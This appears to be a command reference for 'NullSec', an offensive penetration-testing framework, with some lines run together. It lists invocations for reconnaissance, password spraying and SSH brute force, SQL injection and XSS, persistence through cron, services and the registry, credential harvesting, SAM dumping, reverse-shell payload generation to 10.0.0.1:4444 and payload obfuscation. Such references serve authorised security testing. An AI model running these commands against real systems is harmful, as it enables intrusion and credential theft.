Complete module reference for the NullSec security framework.
nullsec recon network --target 192.168.1.0/24
nullsec recon hosts --target 192.168.1.0/24 --ports 22,80,443
nullsec recon services --target 192.168.1.100nullsec recon web --url https://target.com
nullsec recon dns --domain target.com
nullsec recon whois --domain target.comnullsec recon osint --email user@target.com
nullsec recon social --username targetuser
nullsec recon breach --email user@target.comnullsec scan vuln --target 192.168.1.100
nullsec scan web --url https://target.com
nullsec scan ssl --host target.comnullsec scan ports --target 192.168.1.100 --type full
nullsec scan ports --target 192.168.1.0/24 --type quick
nullsec scan udp --target 192.168.1.100nullsec exploit creds --service ssh --target 192.168.1.100
nullsec exploit spray --users users.txt --password Winter2025!
nullsec exploit kerberos --domain corp.localnullsec exploit sqli --url "https://target.com/search?q="
nullsec exploit xss --url https://target.com --crawl
nullsec exploit upload --url https://target.com/uploadnullsec post privesc --os linux
nullsec post privesc --os windows
nullsec post sudo --checknullsec post persist --method cron
nullsec post persist --method service
nullsec post persist --method registrynullsec post harvest --type credentials
nullsec post harvest --type files --pattern "*.conf"
nullsec post dump --type samnullsec util encode --base64 "payload"
nullsec util decode --base64 "cGF5bG9hZA=="
nullsec util hash --md5 "password"nullsec util payload --type reverse --host 10.0.0.1 --port 4444
nullsec util payload --type bind --port 4444
nullsec util obfuscate --input payload.ps1nullsec util proxy --port 8080
nullsec util tunnel --local 8080 --remote target.com:80
nullsec util dns --server 8.8.8.8from nullsec.module import BaseModule
class CustomModule(BaseModule):
name = "custom_module"
description = "Custom security module"
author = "your_name"
def run(self, target, **options):
# Module implementation
passnullsec module install ./custom_module.py
nullsec module list --custom
nullsec module info custom_modulenullsec config set output.format json
nullsec config set proxy.enabled true
nullsec config set threads 10nullsec profile create pentest
nullsec profile use pentest
nullsec profile export pentest > config.ymlFor detailed module documentation, run:
nullsec help <module>